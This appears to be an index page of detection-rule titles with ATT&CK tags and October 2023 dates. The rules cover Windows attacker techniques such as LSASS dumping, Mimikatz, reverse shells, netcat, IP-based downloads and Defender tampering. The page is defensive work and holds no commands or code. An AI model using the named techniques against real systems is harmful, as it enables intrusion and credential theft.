twitter
facebook
linkedin
copy
Visual Studio Code Tunnel Execution
calendar
Oct 28, 2023
·
attack.command_and_control
attack.t1071.001
·
Share on:
twitter
facebook
linkedin
copy
Visual Studio Code Tunnel Service Installation
calendar
Oct 28, 2023
·
attack.command_and_control
attack.t1071.001
·
Share on:
twitter
facebook
linkedin
copy
Visual Studio Code Tunnel Shell Execution
calendar
Oct 28, 2023
·
attack.command_and_control
attack.t1071.001
·
Share on:
twitter
facebook
linkedin
copy
Potential SPN Enumeration Via Setspn.EXE
calendar
Oct 23, 2023
·
attack.credential_access
attack.t1558.003
·
Share on:
twitter
facebook
linkedin
copy
Arbitrary File Download Via GfxDownloadWrapper.EXE
calendar
Oct 23, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
File Download From IP Based URL Via CertOC.EXE
calendar
Oct 23, 2023
·
attack.command_and_control
attack.execution
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
File Download From IP URL Via Curl.EXE
calendar
Oct 23, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
File Download via CertOC.EXE
calendar
Oct 23, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Potential Privilege Escalation To LOCAL SYSTEM
calendar
Oct 23, 2023
·
attack.resource_development
attack.t1587.001
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious Office Document Executed From Trusted Location
calendar
Oct 23, 2023
·
attack.defense_evasion
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Remote File Download Via Desktopimgdownldr Utility
calendar
Oct 23, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Suspicious File Download From IP Via Curl.EXE
calendar
Oct 23, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Suspicious File Downloaded From Direct IP Via Certutil.EXE
calendar
Oct 23, 2023
·
attack.defense_evasion
attack.t1027
·
Share on:
twitter
facebook
linkedin
copy
System File Execution Location Anomaly
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036
·
Share on:
twitter
facebook
linkedin
copy
7Zip Compressing Dump Files
calendar
Oct 18, 2023
·
attack.collection
attack.t1560.001
·
Share on:
twitter
facebook
linkedin
copy
Abused Debug Privilege by Arbitrary Parent Processes
calendar
Oct 18, 2023
·
attack.privilege_escalation
attack.t1548
·
Share on:
twitter
facebook
linkedin
copy
Add User to Local Administrators Group
calendar
Oct 18, 2023
·
attack.persistence
attack.t1098
·
Share on:
twitter
facebook
linkedin
copy
Add Windows Capability Via PowerShell Cmdlet
calendar
Oct 18, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Always Install Elevated MSI Spawned Cmd And Powershell
calendar
Oct 18, 2023
·
attack.privilege_escalation
attack.t1548.002
·
Share on:
twitter
facebook
linkedin
copy
Boot Configuration Tampering Via Bcdedit.EXE
calendar
Oct 18, 2023
·
attack.impact
attack.t1490
·
Share on:
twitter
facebook
linkedin
copy
Capture Credentials with Rpcping.exe
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1003
·
Share on:
twitter
facebook
linkedin
copy
CobaltStrike Load by Rundll32
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218.011
·
Share on:
twitter
facebook
linkedin
copy
Compress Data and Lock With Password for Exfiltration With 7-ZIP
calendar
Oct 18, 2023
·
attack.collection
attack.t1560.001
·
Share on:
twitter
facebook
linkedin
copy
Computer Discovery And Export Via Get-ADComputer Cmdlet
calendar
Oct 18, 2023
·
attack.discovery
attack.t1033
·
Share on:
twitter
facebook
linkedin
copy
ConvertTo-SecureString Cmdlet Usage Via CommandLine
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Copy from Admin Share
calendar
Oct 18, 2023
·
attack.lateral_movement
attack.collection
attack.exfiltration
attack.t1039
attack.t1048
attack.t1021.002
·
Share on:
twitter
facebook
linkedin
copy
Cscript/Wscript Uncommon Script Extension Execution
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.005
attack.t1059.007
·
Share on:
twitter
facebook
linkedin
copy
Detected Windows Software Discovery
calendar
Oct 18, 2023
·
attack.discovery
attack.t1518
·
Share on:
twitter
facebook
linkedin
copy
Disable of ETW Trace
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1070
attack.t1562.006
car.2016-04-002
·
Share on:
twitter
facebook
linkedin
copy
Disable Windows Defender AV Security Monitoring
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
Dism Remove Online Package
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
DriverQuery.EXE Execution
calendar
Oct 18, 2023
·
attack.discovery
·
Share on:
twitter
facebook
linkedin
copy
DumpMinitool Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
Elevated System Shell Spawned
calendar
Oct 18, 2023
·
attack.privilege_escalation
attack.defense_evasion
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
Enumeration for Credentials in Registry
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1552.002
·
Share on:
twitter
facebook
linkedin
copy
Exchange PowerShell Snap-Ins Usage
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
attack.collection
attack.t1114
·
Share on:
twitter
facebook
linkedin
copy
Execution Of Non-Existing File
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Explorer Process Tree Break
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036
·
Share on:
twitter
facebook
linkedin
copy
Exports Registry Key To a File
calendar
Oct 18, 2023
·
attack.exfiltration
attack.t1012
·
Share on:
twitter
facebook
linkedin
copy
File Decryption Using Gpg4win
calendar
Oct 18, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
File Encryption Using Gpg4win
calendar
Oct 18, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
File Encryption/Decryption Via Gpg4win From Suspicious Locations
calendar
Oct 18, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Bloodhound/Sharphound Execution
calendar
Oct 18, 2023
·
attack.discovery
attack.t1087.001
attack.t1087.002
attack.t1482
attack.t1069.001
attack.t1069.002
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - CoercedPotato Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.privilege_escalation
attack.t1055
·
Share on:
twitter
facebook
linkedin
copy
HackTool - CrackMapExec PowerShell Obfuscation
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
attack.defense_evasion
attack.t1027.005
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Mimikatz Execution
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1003.001
attack.t1003.002
attack.t1003.004
attack.t1003.005
attack.t1003.006
·
Share on:
twitter
facebook
linkedin
copy
HackTool - PCHunter Execution
calendar
Oct 18, 2023
·
attack.execution
attack.discovery
attack.t1082
attack.t1057
attack.t1012
attack.t1083
attack.t1007
·
Share on:
twitter
facebook
linkedin
copy
HackTool - PPID Spoofing SelectMyParent Tool Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1134.004
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Rubeus Execution
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1003
attack.t1558.003
attack.lateral_movement
attack.t1550.003
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SharpEvtMute Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1562.002
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SharpImpersonation Execution
calendar
Oct 18, 2023
·
attack.privilege_escalation
attack.defense_evasion
attack.t1134.001
attack.t1134.003
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SharpUp PrivEsc Tool Execution
calendar
Oct 18, 2023
·
attack.privilege_escalation
attack.t1615
attack.t1569.002
attack.t1574.005
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SharpView Execution
calendar
Oct 18, 2023
·
attack.discovery
attack.t1049
attack.t1069.002
attack.t1482
attack.t1135
attack.t1033
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Stracciatella Execution
calendar
Oct 18, 2023
·
attack.execution
attack.defense_evasion
attack.t1059
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - UACMe Akagi Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.privilege_escalation
attack.t1548.002
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Windows Credential Editor (WCE) Execution
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1003.001
attack.s0005
·
Share on:
twitter
facebook
linkedin
copy
HackTool - XORDump Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
Imports Registry Key From a File
calendar
Oct 18, 2023
·
attack.t1112
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Imports Registry Key From an ADS
calendar
Oct 18, 2023
·
attack.t1112
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Indirect Command Execution From Script File Via Bash.EXE
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Indirect Inline Command Execution Via Bash.EXE
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation CLIP+ Launcher
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation COMPRESS OBFUSCATION
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation STDIN+ Launcher
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation VAR+ Launcher
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation Via Stdin
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation Via Use Clip
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Invoke-Obfuscation Via Use MSHTA
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
LOL-Binary Copied From System Directory
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036.003
·
Share on:
twitter
facebook
linkedin
copy
LOLBIN Execution From Abnormal Drive
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
LSASS Dump Keyword In CommandLine
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
Malicious Base64 Encoded PowerShell Keywords in Command Lines
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
MMC Spawning Windows Shell
calendar
Oct 18, 2023
·
attack.lateral_movement
attack.t1021.003
·
Share on:
twitter
facebook
linkedin
copy
Net.exe Execution
calendar
Oct 18, 2023
·
attack.discovery
attack.t1007
attack.t1049
attack.t1018
attack.t1135
attack.t1201
attack.t1069.001
attack.t1069.002
attack.t1087.001
attack.t1087.002
attack.lateral_movement
attack.t1021.002
attack.s0039
·
Share on:
twitter
facebook
linkedin
copy
New Port Forwarding Rule Added Via Netsh.EXE
calendar
Oct 18, 2023
·
attack.lateral_movement
attack.defense_evasion
attack.command_and_control
attack.t1090
·
Share on:
twitter
facebook
linkedin
copy
New User Created Via Net.EXE
calendar
Oct 18, 2023
·
attack.persistence
attack.t1136.001
·
Share on:
twitter
facebook
linkedin
copy
New User Created Via Net.EXE With Never Expire Option
calendar
Oct 18, 2023
·
attack.persistence
attack.t1136.001
·
Share on:
twitter
facebook
linkedin
copy
Non Interactive PowerShell Process Spawned
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Password Provided In Command Line Of Net.EXE
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.initial_access
attack.persistence
attack.privilege_escalation
attack.lateral_movement
attack.t1021.002
attack.t1078
·
Share on:
twitter
facebook
linkedin
copy
Permission Check Via Accesschk.EXE
calendar
Oct 18, 2023
·
attack.discovery
attack.t1069.001
·
Share on:
twitter
facebook
linkedin
copy
Potential Arbitrary File Download Using Office Application
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Potential Browser Data Stealing
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1555.003
·
Share on:
twitter
facebook
linkedin
copy
Potential CommandLine Path Traversal Via Cmd.EXE
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.003
·
Share on:
twitter
facebook
linkedin
copy
Potential Data Exfiltration Activity Via CommandLine Tools
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Potential Defense Evasion Via Rename Of Highly Relevant Binaries
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036.003
car.2013-05-009
·
Share on:
twitter
facebook
linkedin
copy
Potential Encoded PowerShell Patterns In CommandLine
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Potential Memory Dumping Activity Via LiveKD
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Potential Persistence Attempt Via Existing Service Tampering
calendar
Oct 18, 2023
·
attack.persistence
attack.t1543.003
attack.t1574.011
·
Share on:
twitter
facebook
linkedin
copy
Potential PowerShell Command Line Obfuscation
calendar
Oct 18, 2023
·
attack.execution
attack.defense_evasion
attack.t1027
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Potential PowerShell Execution Via DLL
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218.011
·
Share on:
twitter
facebook
linkedin
copy
Potential PowerShell Obfuscation Via Reversed Commands
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Potential Powershell ReverseShell Connection
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Potential Provlaunch.EXE Binary Proxy Execution Abuse
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Potential Recon Activity Using DriverQuery.EXE
calendar
Oct 18, 2023
·
attack.discovery
·
Share on:
twitter
facebook
linkedin
copy
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
calendar
Oct 18, 2023
·
attack.discovery
attack.execution
attack.t1615
attack.t1059.005
·
Share on:
twitter
facebook
linkedin
copy
Potential Register_App.Vbs LOLScript Abuse
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Potential SquiblyTwo Technique Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1047
attack.t1220
attack.execution
attack.t1059.005
attack.t1059.007
·
Share on:
twitter
facebook
linkedin
copy
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
calendar
Oct 18, 2023
·
attack.execution
attack.t1047
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious Child Process Of WinRAR.EXE
calendar
Oct 18, 2023
·
attack.execution
attack.t1203
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious GoogleUpdate Child Process
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious Rundll32 Activity
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218.011
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious WebDAV LNK Execution
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
attack.t1204
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious Windows App Activity
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Base64 Encoded FromBase64String Cmdlet
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1140
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Base64 Encoded IEX Cmdlet
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Base64 Encoded Invoke Keyword
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
attack.defense_evasion
attack.t1027
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Download Pattern
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Script Change Permission Via Set-Acl
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Set-Acl On Windows Folder
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Private Keys Reconnaissance Via CommandLine Tools
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1552.004
·
Share on:
twitter
facebook
linkedin
copy
Process Memory Dump Via Comsvcs.DLL
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.credential_access
attack.t1036
attack.t1003.001
car.2013-05-009
·
Share on:
twitter
facebook
linkedin
copy
PUA - AdvancedRun Execution
calendar
Oct 18, 2023
·
attack.execution
attack.defense_evasion
attack.privilege_escalation
attack.t1564.003
attack.t1134.002
attack.t1059.003
·
Share on:
twitter
facebook
linkedin
copy
PUA - AdvancedRun Suspicious Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.privilege_escalation
attack.t1134.002
·
Share on:
twitter
facebook
linkedin
copy
PUA - Netcat Suspicious Execution
calendar
Oct 18, 2023
·
attack.command_and_control
attack.t1095
·
Share on:
twitter
facebook
linkedin
copy
PUA - Nmap/Zenmap Execution
calendar
Oct 18, 2023
·
attack.discovery
attack.t1046
·
Share on:
twitter
facebook
linkedin
copy
PUA - NSudo Execution
calendar
Oct 18, 2023
·
attack.execution
attack.t1569.002
attack.s0029
·
Share on:
twitter
facebook
linkedin
copy
PUA - Potential PE Metadata Tamper Using Rcedit
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036.003
attack.t1036
attack.t1027.005
attack.t1027
·
Share on:
twitter
facebook
linkedin
copy
PUA - Process Hacker Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.discovery
attack.persistence
attack.privilege_escalation
attack.t1622
attack.t1564
attack.t1543
·
Share on:
twitter
facebook
linkedin
copy
PUA - System Informer Execution
calendar
Oct 18, 2023
·
attack.persistence
attack.privilege_escalation
attack.discovery
attack.defense_evasion
attack.t1082
attack.t1564
attack.t1543
·
Share on:
twitter
facebook
linkedin
copy
PUA- IOX Tunneling Tool Execution
calendar
Oct 18, 2023
·
attack.command_and_control
attack.t1090
·
Share on:
twitter
facebook
linkedin
copy
Python Inline Command Execution
calendar
Oct 18, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
RDP Connection Allowed Via Netsh.EXE
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1562.004
·
Share on:
twitter
facebook
linkedin
copy
Recon Information for Export with Command Prompt
calendar
Oct 18, 2023
·
attack.collection
attack.t1119
·
Share on:
twitter
facebook
linkedin
copy
Regasm/Regsvcs Suspicious Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218.009
·
Share on:
twitter
facebook
linkedin
copy
Remote Access Tool - RURAT Execution From Unusual Location
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Renamed AdFind Execution
calendar
Oct 18, 2023
·
attack.discovery
attack.t1018
attack.t1087.002
attack.t1482
attack.t1069.002
·
Share on:
twitter
facebook
linkedin
copy
Renamed AutoHotkey.EXE Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Renamed AutoIt Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
·
Share on:
twitter
facebook
linkedin
copy
Renamed CreateDump Utility Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
Renamed PAExec Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Script Interpreter Execution From Suspicious Folder
calendar
Oct 18, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
Shadow Copies Creation Using Operating Systems Utilities
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1003
attack.t1003.002
attack.t1003.003
·
Share on:
twitter
facebook
linkedin
copy
Share And Session Enumeration Using Net.EXE
calendar
Oct 18, 2023
·
attack.discovery
attack.t1018
·
Share on:
twitter
facebook
linkedin
copy
Start Windows Service Via Net.EXE
calendar
Oct 18, 2023
·
attack.execution
attack.t1569.002
·
Share on:
twitter
facebook
linkedin
copy
Stop Windows Service Via Net.EXE
calendar
Oct 18, 2023
·
attack.impact
attack.t1489
·
Share on:
twitter
facebook
linkedin
copy
Stop Windows Service Via PowerShell Stop-Service
calendar
Oct 18, 2023
·
attack.impact
attack.t1489
·
Share on:
twitter
facebook
linkedin
copy
Stop Windows Service Via Sc.EXE
calendar
Oct 18, 2023
·
attack.impact
attack.t1489
·
Share on:
twitter
facebook
linkedin
copy
Suspect Svchost Activity
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.privilege_escalation
attack.t1055
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Add User to Remote Desktop Users Group
calendar
Oct 18, 2023
·
attack.persistence
attack.lateral_movement
attack.t1133
attack.t1136.001
attack.t1021.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Advpack Call Via Rundll32.EXE
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Child Process of AspNetCompiler
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1127
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Child Process Of BgInfo.EXE
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.005
attack.defense_evasion
attack.t1218
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Copy From or To System Directory
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036.003
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Csi.exe Usage
calendar
Oct 18, 2023
·
attack.execution
attack.t1072
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Download from Office Domain
calendar
Oct 18, 2023
·
attack.command_and_control
attack.t1105
attack.t1608
·
Share on:
twitter
facebook
linkedin
copy
Suspicious DumpMinitool Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Electron Application Child Processes
calendar
Oct 18, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Encoded PowerShell Command Line
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Execution From GUID Like Folder Names
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1027
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Execution Of PDQDeployRunner
calendar
Oct 18, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Group And Account Reconnaissance Activity Using Net.EXE
calendar
Oct 18, 2023
·
attack.discovery
attack.t1087.001
attack.t1087.002
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Invoke-WebRequest Execution
calendar
Oct 18, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Invoke-WebRequest Execution With DirectIP
calendar
Oct 18, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Manipulation Of Default Accounts Via Net.EXE
calendar
Oct 18, 2023
·
attack.collection
attack.t1560.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Microsoft Office Child Process
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.execution
attack.t1047
attack.t1204.002
attack.t1218.010
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Microsoft OneNote Child Process
calendar
Oct 18, 2023
·
attack.t1566
attack.t1566.001
attack.initial_access
·
Share on:
twitter
facebook
linkedin
copy
Suspicious MSHTA Child Process
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218.005
car.2013-02-003
car.2013-03-001
car.2014-04-003
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Mshta.EXE Execution Patterns
calendar
Oct 18, 2023
·
attack.execution
attack.t1106
·
Share on:
twitter
facebook
linkedin
copy
Suspicious MsiExec Embedding Parent
calendar
Oct 18, 2023
·
attack.t1218.007
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Msiexec Execute Arbitrary DLL
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218.007
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Outlook Child Process
calendar
Oct 18, 2023
·
attack.execution
attack.t1204.002
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Parent Double Extension File Execution
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036.007
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Powercfg Execution To Change Lock Screen Timeout
calendar
Oct 18, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Suspicious PowerShell Parent Process
calendar
Oct 18, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Process Start Locations
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1036
car.2013-05-002
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1562.004
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Program Names
calendar
Oct 18, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Provlaunch.EXE Child Process
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Remote Child Process From Outlook
calendar
Oct 18, 2023
·
attack.execution
attack.t1059
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Suspicious SYSTEM User Process Creation
calendar
Oct 18, 2023
·
attack.credential_access
attack.defense_evasion
attack.privilege_escalation
attack.t1134
attack.t1003
attack.t1027
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
calendar
Oct 18, 2023
·
attack.credential_access
attack.t1003.003
·
Share on:
twitter
facebook
linkedin
copy
Suspicious WebDav Client Execution Via Rundll32.EXE
calendar
Oct 18, 2023
·
attack.exfiltration
attack.t1048.003
cve.2023.23397
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
calendar
Oct 18, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy